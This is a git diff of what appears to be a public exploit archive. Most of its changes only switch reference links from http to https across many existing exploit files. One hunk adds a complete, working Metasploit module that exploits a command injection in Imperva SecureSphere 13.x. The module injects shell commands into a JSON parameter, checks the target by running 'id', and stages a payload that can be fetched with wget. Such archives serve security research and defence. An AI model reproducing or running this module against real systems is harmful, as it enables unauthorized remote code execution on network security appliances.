https://www.securityfocus.com/bid/47975/info Vordel Gateway is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. 
diff --git a/exploits/linux/remote/35801.txt b/exploits/linux/remote/35801.txt index a5025ed69..a6a7be7b8 100644 --- a/exploits/linux/remote/35801.txt +++ b/exploits/linux/remote/35801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48008/info +source: https://www.securityfocus.com/bid/48008/info Asterisk is prone to a user-enumeration weakness. diff --git a/exploits/linux/remote/35810.txt b/exploits/linux/remote/35810.txt index aca56e930..bc50b6213 100644 --- a/exploits/linux/remote/35810.txt +++ b/exploits/linux/remote/35810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48056/info +source: https://www.securityfocus.com/bid/48056/info The 'libxml2' library is prone to multiple memory-corruption vulnerabilities, including one that can trigger a heap-based buffer-overflow error and an integer-overflow condition. diff --git a/exploits/linux/remote/35836.pl b/exploits/linux/remote/35836.pl index f86f5c95a..5faa6c33d 100755 --- a/exploits/linux/remote/35836.pl +++ b/exploits/linux/remote/35836.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48167/info +source: https://www.securityfocus.com/bid/48167/info The Perl Data::FormValidator module is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/36199.txt b/exploits/linux/remote/36199.txt index 7a053cbe3..7a4d68aa6 100644 --- a/exploits/linux/remote/36199.txt +++ b/exploits/linux/remote/36199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49911/info +source: https://www.securityfocus.com/bid/49911/info The Digest module for Perl is prone to a vulnerability that will let attackers inject and execute arbitrary Perl code. diff --git a/exploits/linux/remote/36352.txt b/exploits/linux/remote/36352.txt index fd75092a1..7afe45ad5 100644 --- a/exploits/linux/remote/36352.txt +++ b/exploits/linux/remote/36352.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50802/info +source: https://www.securityfocus.com/bid/50802/info Apache HTTP Server is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/36663.txt b/exploits/linux/remote/36663.txt index 9a644a119..a2d103802 100644 --- a/exploits/linux/remote/36663.txt +++ b/exploits/linux/remote/36663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51869/info +source: https://www.securityfocus.com/bid/51869/info Apache HTTP Server is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/36884.py b/exploits/linux/remote/36884.py index 45c8f4f65..4587215c5 100755 --- a/exploits/linux/remote/36884.py +++ b/exploits/linux/remote/36884.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52175/info +source: https://www.securityfocus.com/bid/52175/info libpurple is prone to an information-disclosure vulnerability. diff --git a/exploits/linux/remote/37007.txt b/exploits/linux/remote/37007.txt index 40ea2bb8f..39965decd 100644 --- a/exploits/linux/remote/37007.txt +++ b/exploits/linux/remote/37007.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52684/info +source: https://www.securityfocus.com/bid/52684/info AtMail is prone to multiple directory-traversal vulnerabilities, an arbitrary-file-upload vulnerability, and an information-disclosure vulnerability because the application fails to sanitize user-supplied input. diff --git a/exploits/linux/remote/37576.cpp b/exploits/linux/remote/37576.cpp index a10f22f6d..7df0fc94d 100644 --- a/exploits/linux/remote/37576.cpp +++ b/exploits/linux/remote/37576.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54816/info +source: https://www.securityfocus.com/bid/54816/info Calligra is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/linux/remote/37788.py b/exploits/linux/remote/37788.py index 8c998ae02..05542b41c 100755 --- a/exploits/linux/remote/37788.py 
+++ b/exploits/linux/remote/37788.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55497/info +source: https://www.securityfocus.com/bid/55497/info libguac is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/linux/remote/37834.py b/exploits/linux/remote/37834.py index 8457f1c41..1f75fb98d 100755 --- a/exploits/linux/remote/37834.py +++ b/exploits/linux/remote/37834.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55655/info +source: https://www.securityfocus.com/bid/55655/info Samba is prone to an unspecified remote code-execution vulnerability. diff --git a/exploits/linux/remote/3787.c b/exploits/linux/remote/3787.c index d4283aaf9..b7efe5607 100644 --- a/exploits/linux/remote/3787.c +++ b/exploits/linux/remote/3787.c @@ -7,7 +7,7 @@ ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** -** Reference: http://www.securityfocus.com/bid/14794 (2005/09/09) +** Reference: https://www.securityfocus.com/bid/14794 (2005/09/09) ** http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=303 ** ** -- diff --git a/exploits/linux/remote/37889.txt b/exploits/linux/remote/37889.txt index be15756aa..6399064f5 100644 --- a/exploits/linux/remote/37889.txt +++ b/exploits/linux/remote/37889.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55685/info +source: https://www.securityfocus.com/bid/55685/info An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process. diff --git a/exploits/linux/remote/37949.txt b/exploits/linux/remote/37949.txt index 22cf53cc5..77bdfeb9c 100644 --- a/exploits/linux/remote/37949.txt +++ b/exploits/linux/remote/37949.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56096/info +source: https://www.securityfocus.com/bid/56096/info ModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/38109.pl b/exploits/linux/remote/38109.pl index 5baa2b3c5..c6b97655e 100755 --- a/exploits/linux/remote/38109.pl +++ b/exploits/linux/remote/38109.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56837/info +source: https://www.securityfocus.com/bid/56837/info MySQL and MariaDB are prone to a security-bypass weakness. diff --git a/exploits/linux/remote/3815.c b/exploits/linux/remote/3815.c index 37cef8d0d..3d0d1cd2f 100644 --- a/exploits/linux/remote/3815.c +++ b/exploits/linux/remote/3815.c @@ -7,7 +7,7 @@ ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** -** Reference: http://www.securityfocus.com/bid/17678 +** Reference: https://www.securityfocus.com/bid/17678 ** vendor: http://streaming.polito.it/legacy_server ** ** -- diff --git a/exploits/linux/remote/38203.txt b/exploits/linux/remote/38203.txt index 1c795810d..cb11d95cb 100644 --- a/exploits/linux/remote/38203.txt +++ b/exploits/linux/remote/38203.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57237/info +source: https://www.securityfocus.com/bid/57237/info Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/3829.c b/exploits/linux/remote/3829.c index 753dae476..f6373ff52 100644 --- a/exploits/linux/remote/3829.c +++ b/exploits/linux/remote/3829.c 
@@ -7,7 +7,7 @@ ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** -** Reference: http://www.securityfocus.com/bid/23545 +** Reference: https://www.securityfocus.com/bid/23545 ** vendor: http://3proxy.ru/ ** ** vade79/v9 v9@fakehalo.us (fakehalo/realhalo)'s exploit: diff --git a/exploits/linux/remote/38522.txt b/exploits/linux/remote/38522.txt index bb8e3ecdd..1e11ed9a4 100644 --- a/exploits/linux/remote/38522.txt +++ b/exploits/linux/remote/38522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60010/info +source: https://www.securityfocus.com/bid/60010/info thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/38680.html b/exploits/linux/remote/38680.html index 564385ed0..b2ed06e54 100644 --- a/exploits/linux/remote/38680.html +++ b/exploits/linux/remote/38680.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61491/info +source: https://www.securityfocus.com/bid/61491/info XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities. diff --git a/exploits/linux/remote/38741.txt b/exploits/linux/remote/38741.txt index 102a642bc..18d258e9d 100644 --- a/exploits/linux/remote/38741.txt +++ b/exploits/linux/remote/38741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62024/info +source: https://www.securityfocus.com/bid/62024/info Nmap is prone to an arbitrary file-write vulnerability. diff --git a/exploits/linux/remote/38826.py b/exploits/linux/remote/38826.py index d4bed5a1d..48d389f82 100755 --- a/exploits/linux/remote/38826.py +++ b/exploits/linux/remote/38826.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63743/info +source: https://www.securityfocus.com/bid/63743/info Linux Kernel is prone to an information-disclosure vulnerability. 
diff --git a/exploits/linux/remote/39097.txt b/exploits/linux/remote/39097.txt index f4f53b295..f19cee03e 100644 --- a/exploits/linux/remote/39097.txt +++ b/exploits/linux/remote/39097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65587/info +source: https://www.securityfocus.com/bid/65587/info Red Hat Piranha is prone to a remote security bypass vulnerability. diff --git a/exploits/linux/remote/39155.txt b/exploits/linux/remote/39155.txt index 95518cef0..22d1f2fb5 100644 --- a/exploits/linux/remote/39155.txt +++ b/exploits/linux/remote/39155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67159/info +source: https://www.securityfocus.com/bid/67159/info lxml is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/39196.py b/exploits/linux/remote/39196.py index 606cf43e3..54db18bf2 100755 --- a/exploits/linux/remote/39196.py +++ b/exploits/linux/remote/39196.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67534/info +source: https://www.securityfocus.com/bid/67534/info mod_wsgi is prone to a remote information-disclosure vulnerability. diff --git a/exploits/linux/remote/4162.c b/exploits/linux/remote/4162.c index 7a73d5704..ad60c6624 100644 --- a/exploits/linux/remote/4162.c +++ b/exploits/linux/remote/4162.c @@ -7,7 +7,7 @@ ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** -** Reference: http://www.securityfocus.com/bid/22791 +** Reference: https://www.securityfocus.com/bid/22791 ** vendor: http://tomcat.apache.org/ ** ** eliteboy's exploit (SUSE, Debian, FreeBSD): diff --git a/exploits/linux/remote/4514.c b/exploits/linux/remote/4514.c index 3b1206f9f..ecff26cf3 100644 --- a/exploits/linux/remote/4514.c +++ b/exploits/linux/remote/4514.c 
@@ -1,6 +1,6 @@ /* Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability - http://www.securityfocus.com/bid/24070 + https://www.securityfocus.com/bid/24070 discovered by Bow Sineath tested on eggdrop 1.6.18 / linux 2.4 diff --git a/exploits/linux/remote/46509.rb b/exploits/linux/remote/46509.rb new file mode 100755 index 000000000..5beeb7547 --- /dev/null +++ b/exploits/linux/remote/46509.rb 
@@ -0,0 +1,143 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Imperva SecureSphere PWS Command Injection', + 'Description' => %q( + This module exploits a command injection vulnerability in Imperva + SecureSphere 13.x. The vulnerability exists in the PWS service, + where Python CGIs didn't properly sanitize user supplied command + parameters and directly passes them to corresponding CLI utility, + leading to command injection. Agent registration credential is + required to exploit SecureSphere in gateway mode. + + This module was successfully tested on Imperva SecureSphere 13.0/13.1/ + 13.2 in pre-ftl mode and unsealed gateway mode. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rsp3ar gmail.com>' # Discovery/Metasploit Module + ], + 'References' => + [ + [ 'EDB', '45542' ] + ], + 'DisclosureDate' => "Oct 8 2018", + 'DefaultOptions' => { + 'SSL' => true, + 'PrependFork' => true, + }, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'CmdStagerFlavor' => %w{ echo printf wget }, + 'Targets' => + [ + ['Imperva SecureSphere 13.0/13.1/13.2', {}] + ], + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']), + OptString.new('PASSWORD', [false, 'Agent registration password', '']), + OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']), + OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15]) + ]) + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ] + end + + def check + begin + res = execute_command('id') + rescue => e + vprint_error("#{e}") + return 
CheckCode::Unknown + end + + if res.body =~ /uid=\d+/ + return CheckCode::Vulnerable + end + + CheckCode::Safe + end + + def exploit + unless CheckCode::Vulnerable == check + unless datastore['ForceExploit'] + fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.') + end + print_warning 'Target does not appear to be vulnerable' + end + + print_status("Sending payload #{datastore['PAYLOAD']}") + execute_cmdstager + end + + def execute_command(cmd, opts = {}) + data = { + 'command' => 'impctl server status', + 'parameters' => { + 'broadcast' => true, + 'installer-address' => "127.0.0.1 $(#{cmd})" + } + } + + res = send_request data + + return unless res + + if res.code == 401 + fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required') + end + + unless res.code == 406 && res.body.include?("impctl") + fail_with(Failure::Unknown, 'Server did not respond in an expected way') + end + + res + end + + def send_request(data) + req_params = { + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'data' => data.to_json + } + + if !datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank? + unless @cookie + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('/') + }) + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + @cookie = res.get_cookies + end + + req_params['cookie'] = @cookie + req_params['headers'] = { + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + } + end + + send_request_cgi(req_params, datastore['TIMEOUT']) + end +end \ No newline at end of file diff --git a/exploits/linux/remote/74.c b/exploits/linux/remote/74.c index 23b608d86..dc4f0379d 100644 --- a/exploits/linux/remote/74.c +++ b/exploits/linux/remote/74.c @@ -1,4 +1,4 @@ - /* +/* ** ** wu-ftpd v2.6.2 off-by-one remote 0day exploit. ** 
diff --git a/exploits/linux/remote/940.c b/exploits/linux/remote/940.c index af8c1ec1f..6d8eeaa1c 100644 --- a/exploits/linux/remote/940.c +++ b/exploits/linux/remote/940.c @@ -1,4 +1,4 @@ - /*[ sumus[v0.2.2]: (httpd) remote buffer overflow exploit. ]**** +/*[ sumus[v0.2.2]: (httpd) remote buffer overflow exploit. ]**** * * * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) * * * diff --git a/exploits/linux/webapps/20706.rb b/exploits/linux/webapps/20706.rb index 669fc6223..75a993b3a 100755 --- a/exploits/linux/webapps/20706.rb +++ b/exploits/linux/webapps/20706.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2012-2977' ], [ 'OSVDB', '0' ], [ 'BID', '54430' ], - [ 'URL', 'http://www.securityfocus.com/bid/54430' ], + [ 'URL', 'https://www.securityfocus.com/bid/54430' ], ], 'DisclosureDate' => "Jul 23 2012" )) diff --git a/exploits/linux/webapps/30286.txt b/exploits/linux/webapps/30286.txt index 2f803ecce..a0c6e3c08 100644 --- a/exploits/linux/webapps/30286.txt +++ b/exploits/linux/webapps/30286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24853/info +source: https://www.securityfocus.com/bid/24853/info ImgSvr is prone to a local file-include vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/linux_x86-64/dos/21224.c b/exploits/linux_x86-64/dos/21224.c index cbff30b60..3da019de3 100644 --- a/exploits/linux_x86-64/dos/21224.c +++ b/exploits/linux_x86-64/dos/21224.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/55471/info +source: https://www.securityfocus.com/bid/55471/info Oracle VM VirtualBox is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux_x86-64/dos/33585.txt b/exploits/linux_x86-64/dos/33585.txt index 7dcfda278..4af783d69 100644 --- a/exploits/linux_x86-64/dos/33585.txt +++ b/exploits/linux_x86-64/dos/33585.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38027/info +source: https://www.securityfocus.com/bid/38027/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux_x86-64/local/32751.c b/exploits/linux_x86-64/local/32751.c index 11dcc4e2d..a7bfd6595 100644 --- a/exploits/linux_x86-64/local/32751.c +++ b/exploits/linux_x86-64/local/32751.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/33417/info +source: https://www.securityfocus.com/bid/33417/info Systrace is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux_x86/remote/20032.txt b/exploits/linux_x86/remote/20032.txt index 4c4f73629..a183b800b 100644 --- a/exploits/linux_x86/remote/20032.txt +++ b/exploits/linux_x86/remote/20032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1387/info +source: https://www.securityfocus.com/bid/1387/info Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet. diff --git a/exploits/macos/dos/45891.c b/exploits/macos/dos/45891.c index 196667e05..b41ccc7e7 100644 --- a/exploits/macos/dos/45891.c +++ b/exploits/macos/dos/45891.c @@ -1,3 +1,4 @@ +/* # Exploit Title: MacOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) # Date: 2018-07-30 # Exploit Author: Fabiano Anemone 
@@ -14,6 +15,7 @@ # Copyright © 2018 FABIANO ANEMONE (fabiano.anemone@gmail.com). All rights reserved. # Reported to product-security@apple.com on 7/30/18 # Fixed in Mojave. +*/ #include #include diff --git a/exploits/multiple/dos/10077.txt b/exploits/multiple/dos/10077.txt index b0b79216d..9b12198b7 100644 --- a/exploits/multiple/dos/10077.txt +++ b/exploits/multiple/dos/10077.txt @@ -2,7 +2,7 @@ Attackers use readily available LDAP commands to exploit this issue. -source: http://www.securityfocus.com/bid/27778/info +source: https://www.securityfocus.com/bid/27778/info OpenLDAP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/15467.txt b/exploits/multiple/dos/15467.txt index ceb15e7d4..a81a0151f 100644 --- a/exploits/multiple/dos/15467.txt +++ b/exploits/multiple/dos/15467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42596/info +source: https://www.securityfocus.com/bid/42596/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/15676.txt b/exploits/multiple/dos/15676.txt index 670db6199..8a12362a7 100644 --- a/exploits/multiple/dos/15676.txt +++ b/exploits/multiple/dos/15676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44987/info +source: https://www.securityfocus.com/bid/44987/info Wireshark is prone to a buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/15898.py b/exploits/multiple/dos/15898.py index 0db22ce14..083cc346f 100755 --- a/exploits/multiple/dos/15898.py +++ b/exploits/multiple/dos/15898.py @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/45634/info +# source: https://www.securityfocus.com/bid/45634/info #!/usr/bin/env python diff --git a/exploits/multiple/dos/15973.txt b/exploits/multiple/dos/15973.txt index 4d932c949..9d34d011e 100644 --- a/exploits/multiple/dos/15973.txt +++ b/exploits/multiple/dos/15973.txt 
@@ -1,4 +1,4 @@ -Source: http://www.securityfocus.com/bid/44986/info +Source: https://www.securityfocus.com/bid/44986/info Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain types of packets. diff --git a/exploits/multiple/dos/16108.txt b/exploits/multiple/dos/16108.txt index 35a5da3bb..9261ac81d 100644 --- a/exploits/multiple/dos/16108.txt +++ b/exploits/multiple/dos/16108.txt @@ -1,4 +1,4 @@ -Source: http://www.securityfocus.com/bid/46008/info +Source: https://www.securityfocus.com/bid/46008/info VLC media player is prone to a heap-based memory-corruption vulnerability. diff --git a/exploits/multiple/dos/17120.c b/exploits/multiple/dos/17120.c index 6e1bca93b..585983026 100644 --- a/exploits/multiple/dos/17120.c +++ b/exploits/multiple/dos/17120.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/46563/info +source: https://www.securityfocus.com/bid/46563/info GNU glibc is prone to a stack-corruption vulnerability. diff --git a/exploits/multiple/dos/18758.txt b/exploits/multiple/dos/18758.txt index 5612789d8..038e54641 100644 --- a/exploits/multiple/dos/18758.txt +++ b/exploits/multiple/dos/18758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52735/info +source: https://www.securityfocus.com/bid/52735/info Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. diff --git a/exploits/multiple/dos/18918.txt b/exploits/multiple/dos/18918.txt index d2cc5fbcf..da423e6d2 100644 --- a/exploits/multiple/dos/18918.txt +++ b/exploits/multiple/dos/18918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53652/info +source: https://www.securityfocus.com/bid/53652/info Wireshark is prone to a denial-of-service vulnerability because it fails to properly allocate memory. diff --git a/exploits/multiple/dos/18919.txt b/exploits/multiple/dos/18919.txt index aa5488b64..da236c171 100644 --- a/exploits/multiple/dos/18919.txt 
+++ b/exploits/multiple/dos/18919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53651/info +source: https://www.securityfocus.com/bid/53651/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/multiple/dos/18920.txt b/exploits/multiple/dos/18920.txt index f37feb82a..3b22f189c 100644 --- a/exploits/multiple/dos/18920.txt +++ b/exploits/multiple/dos/18920.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53653/info +source: https://www.securityfocus.com/bid/53653/info Wireshark is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/19212.txt b/exploits/multiple/dos/19212.txt index e6ee579b7..27ce76561 100644 --- a/exploits/multiple/dos/19212.txt +++ b/exploits/multiple/dos/19212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/267/info +source: https://www.securityfocus.com/bid/267/info A set of vulnerabilities in the counter.exe web hit counter program enables denial of service attacks. diff --git a/exploits/multiple/dos/19225.txt b/exploits/multiple/dos/19225.txt index 3fe309cca..cc5324517 100644 --- a/exploits/multiple/dos/19225.txt +++ b/exploits/multiple/dos/19225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/282/info +source: https://www.securityfocus.com/bid/282/info A vulnerability in the Compaq Management Agents and the Compaq Survey Utility when running as an agent allows remote malicious users to steal local files. All Compaq Server and Client Management Agents version 4.0 or later are vulnerable. All Compaq Survey Utility versions 2.0 or later are vulnerable. diff --git a/exploits/multiple/dos/19228.pl b/exploits/multiple/dos/19228.pl index 05054fbb9..7d5062a61 100755 --- a/exploits/multiple/dos/19228.pl +++ b/exploits/multiple/dos/19228.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/286/info +source: https://www.securityfocus.com/bid/286/info Microsoft's JET database engine feature allows the embedding of Visual Basic for Application in SQL string expressions and the lack of metacharacter filtering by many web applications may allow remote users to execute commands on the system. diff --git a/exploits/multiple/dos/19230.txt b/exploits/multiple/dos/19230.txt index de5f555cf..26b0509bf 100644 --- a/exploits/multiple/dos/19230.txt +++ b/exploits/multiple/dos/19230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/288/info +source: https://www.securityfocus.com/bid/288/info Servers running PCAnywhere32 with TCP/IP networking are subject to a Denial of Service attack that will hang the server at 100% CPU utilization. A malicious user may initiate this DoS by connecting to tcp port 5631 on the PCAnywhere server input a large amount of data when prompted with "Please press ". diff --git a/exploits/multiple/dos/19368.sh b/exploits/multiple/dos/19368.sh index 884f403dc..034637142 100755 --- a/exploits/multiple/dos/19368.sh +++ b/exploits/multiple/dos/19368.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/487/info +source: https://www.securityfocus.com/bid/487/info Lotus Notes SMTP MTA is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data may allow an unauthorized user to relay email via this server. diff --git a/exploits/multiple/dos/19377.txt b/exploits/multiple/dos/19377.txt index 3e2f43fd9..6f1bc1550 100644 --- a/exploits/multiple/dos/19377.txt +++ b/exploits/multiple/dos/19377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/502/info +source: https://www.securityfocus.com/bid/502/info The imapd login process is susceptible to a buffer overflow attack which will crash the service. 
diff --git a/exploits/multiple/dos/19378.txt b/exploits/multiple/dos/19378.txt index 3a8abbcb6..1c196d96e 100644 --- a/exploits/multiple/dos/19378.txt +++ b/exploits/multiple/dos/19378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/503/info +source: https://www.securityfocus.com/bid/503/info The IMail ldap service has an unchecked buffer, resulting in a classic buffer overflow vulnerability. While it does not crash the service, it drives CPU utilization up rendering the system essentially unusable. diff --git a/exploits/multiple/dos/19379.txt b/exploits/multiple/dos/19379.txt index e0085c5e5..c80b91306 100644 --- a/exploits/multiple/dos/19379.txt +++ b/exploits/multiple/dos/19379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/504/info +source: https://www.securityfocus.com/bid/504/info The IMail IMonitor service can be crashed by exploiting a buffer overflow vulnerability. diff --git a/exploits/multiple/dos/19380.txt b/exploits/multiple/dos/19380.txt index 6911d545d..93136a7d5 100644 --- a/exploits/multiple/dos/19380.txt +++ b/exploits/multiple/dos/19380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/505/info +source: https://www.securityfocus.com/bid/505/info The IMail web server can be crashed by requesting an abnormally long URL. diff --git a/exploits/multiple/dos/19382.txt b/exploits/multiple/dos/19382.txt index 722805cc2..473d29e2d 100644 --- a/exploits/multiple/dos/19382.txt +++ b/exploits/multiple/dos/19382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/506/info +source: https://www.securityfocus.com/bid/506/info IMail's whois server can be crashed due to an unchecked buffer. diff --git a/exploits/multiple/dos/19446.pl b/exploits/multiple/dos/19446.pl index e24b45e81..f12f3b515 100755 --- a/exploits/multiple/dos/19446.pl +++ b/exploits/multiple/dos/19446.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/569/info +source: https://www.securityfocus.com/bid/569/info Specifying a negative content-length in a POST operation to the WebTrends Enterprise Reporting Server will crash the web server. diff --git a/exploits/multiple/dos/19457.txt b/exploits/multiple/dos/19457.txt index cfd97a1e4..53a82303d 100644 --- a/exploits/multiple/dos/19457.txt +++ b/exploits/multiple/dos/19457.txt @@ -1,6 +1,6 @@ Microsoft Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 i386 Malformed HTTP Request Header DoS -source: http://www.securityfocus.com/bid/579/info +source: https://www.securityfocus.com/bid/579/info Microsoft IIS and all other products that use the IIS web engine have a vulnerability whereby a flood of specially formed HTTP request headers will make IIS consume all available memory on the server and then hang. IIS activity will be halted until the flood ceases or the service is stopped and restarted. diff --git a/exploits/multiple/dos/19536.txt b/exploits/multiple/dos/19536.txt index c4e1a5f80..444f04947 100644 --- a/exploits/multiple/dos/19536.txt +++ b/exploits/multiple/dos/19536.txt @@ -1,6 +1,6 @@ Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Commerce Server 1.12/Communications Server 1.1/Enterprise Server 2.0 a nph-test-cgi Vulnerability -source: http://www.securityfocus.com/bid/686/info +source: https://www.securityfocus.com/bid/686/info Description as given by Josh Richards: diff --git a/exploits/multiple/dos/19571.c b/exploits/multiple/dos/19571.c index 9d4069c14..7e6afab5d 100644 --- a/exploits/multiple/dos/19571.c +++ b/exploits/multiple/dos/19571.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/748/info +// source: https://www.securityfocus.com/bid/748/info Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service. diff --git a/exploits/multiple/dos/19750.sh b/exploits/multiple/dos/19750.sh index f05e51f88..9c9f0d729 100755 --- a/exploits/multiple/dos/19750.sh +++ b/exploits/multiple/dos/19750.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/984/info +source: https://www.securityfocus.com/bid/984/info Simple connections and disconnections to Timbuktu ports can hang the authentication process and halt all Timbuktu services. To return to normal functionality, the Timbuktu process will need to be killed and the Timbuktu service is required to be stopped and restarted. diff --git a/exploits/multiple/dos/19780.txt b/exploits/multiple/dos/19780.txt index 4af17b9e4..74b7780ce 100644 --- a/exploits/multiple/dos/19780.txt +++ b/exploits/multiple/dos/19780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1013/info +source: https://www.securityfocus.com/bid/1013/info Trend Micro OfficeScan is an antivirus software 